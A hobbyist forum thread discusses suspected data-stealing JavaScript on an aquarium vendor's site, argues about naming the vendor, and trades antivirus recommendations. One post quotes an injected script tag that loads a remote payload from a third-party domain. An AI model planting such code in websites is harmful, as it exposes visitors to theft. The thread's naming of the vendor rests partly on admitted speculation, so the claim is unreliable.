that’s the issue. speculating and assuming can be very damaging. i’m just saying, either call out @AquaSD by name or do some more investigating before you post about it, to ensure you’re not making false statements. that’s all.
Malware on a vendor website
- Thread starter aqua_code
- Start date
- Tagged users None
- Status
that’s the issue. speculating and assuming can be very damaging. i’m just saying, either call out @AquaSD by name or do some more investigating before you post about it, to ensure you’re not making false statements. that’s all.
- Joined
- Sep 28, 2019
- Messages
- 1,637
- Reaction score
- 1,093
That's the thing, revhtree is trying to deal with it before outing a vendor. Let the mods do their thing.
lmm1967
Well-Known Member
There are more false positives (and threats you don't even know exist yet) floating around than there are actual compromised sites / threats.
I hope a disclosure has been provided to the vendor - if there has been and they are ignoring it - expose them. If they are cooperative and working on it - give them the space to do so.
And remember - you're data has been compromised - if you think you haven't been - you simply don't know it yet.
I hope a disclosure has been provided to the vendor - if there has been and they are ignoring it - expose them. If they are cooperative and working on it - give them the space to do so.
And remember - you're data has been compromised - if you think you haven't been - you simply don't know it yet.
i agree. if there wasn’t sufficient evidence to begin with, no need to make anything public. otherwise it’s obvious tons of people will want to know the vendor. which is exactly what happened. reverse logic here.
NanoDJS
Valuable Member
The OP was just trying to protect the community, I respect that. He saw it and said something without trying to "out" the site , like was discussed. I confirmed his suspicion privately and now the mods are dealing with it at this point I'm sure. That being said , be thankful somebody cared enough to warn you . Its been happening a REALLY long time, I cant believe NOBODY but the OP and myself even knew ..... c'mon thats pathetic , to all the people who were wondering what antivirus to use , I would strongly suggest ESET NOD 32, as was mentioned. It is the end users responsibility to protect their electronic communication , period. Dont let your nuts drag out there folks. An ounce of prevention is worth a pound of cure , correct.
OP
OP
aqua_code
Active Member
The script appears to to search for and copy data from your local hard drive and send it to a remote location. Just briefly looking at the attack matrix below, it doesn't look good even if it is a false positive. I wouldn't want a script utilizing process injection, security software discovery, and remote file copy processes when I was browsing for corals.
It looks to me like the javascript utilizes a remote domain sending json through a "/optout/set/lt" URL. A similar type of malware appears in wordpress sites and appears in this stackoverflow:
stackoverflow.com
My guess is they are using an old or outdated shopify theme or plugin and it was compromised somehow like earlier posters were saying. I do not think the vendor is aware of the issue, or how to properly fix it. It's not my intention to bash any vendor and I do my research before posting anything, especially web development related.
It looks to me like the javascript utilizes a remote domain sending json through a "/optout/set/lt" URL. A similar type of malware appears in wordpress sites and appears in this stackoverflow:
How to get rid of this weird piece of code automatically added to my content?
I've got this weird issue. On my WordPress site, when I use WpBakery to add some content I'm getting this code added in: <p><script src="//lifebounce.net/1f9f5ee62aefca3cb1.js" async="" ...
My guess is they are using an old or outdated shopify theme or plugin and it was compromised somehow like earlier posters were saying. I do not think the vendor is aware of the issue, or how to properly fix it. It's not my intention to bash any vendor and I do my research before posting anything, especially web development related.
Last edited:
MnFish1
10K Club member
Maybe that is a good idea. I have had numerous 'false alarms' with antivirus programs - or my misinterpretation of them - if you dont want to post the vendor - thats fine - but - you've done what you needed to do let the site people determine the next step (in my humble opinion)
aqua_code,
Can you please email me the site? I would like to see if my existing Bitdefender will flag the trouble.
You're a gentleman...
Can you please email me the site? I would like to see if my existing Bitdefender will flag the trouble.
You're a gentleman...
NeonRabbit221B
2500 Club Member
Can someone PM me the details. I had an unauthorized used of my card last night after shopping around on a few sites.. Not sure if related
Bitdefender will flag the trouble if its a updated version. Mine did every time I opened their pages during sale.
canadianeh
Valuable Member
- Joined
- Feb 28, 2017
- Messages
- 1,611
- Reaction score
- 1,044
Please PM me too, OP!
The vendor has been identified in a previous post.
me & my baby
Active Member
- Joined
- Feb 26, 2014
- Messages
- 467
- Reaction score
- 209
Bitdefender has been great for me
Silver14SS
Valuable Member
Post #41 on this page names the vendor - AquaSD
Malware on a vendor website
I will not, if you would like to start your own thread with the information please do so. I just based this on speculation. I sent you a message of the site and where the code is. that’s the issue. speculating and assuming can be very damaging. i’m just saying, either call out @AquaSD by name...
www.reef2reef.com
Listening to the OP I can tell that he knows what he is talking about. Now that the name is posted I hope nobody is thinking of going there to check if their AV software is going to go off LOL 
.
I use ESET and it is not cheap, but they update the signature DB at least once per day if not more.
Five years and it's caught everything. I check my running Processes from time to time and so far all the files check out.
.I use ESET and it is not cheap, but they update the signature DB at least once per day if not more.
Five years and it's caught everything. I check my running Processes from time to time and so far all the files check out.
- Status
Similar threads
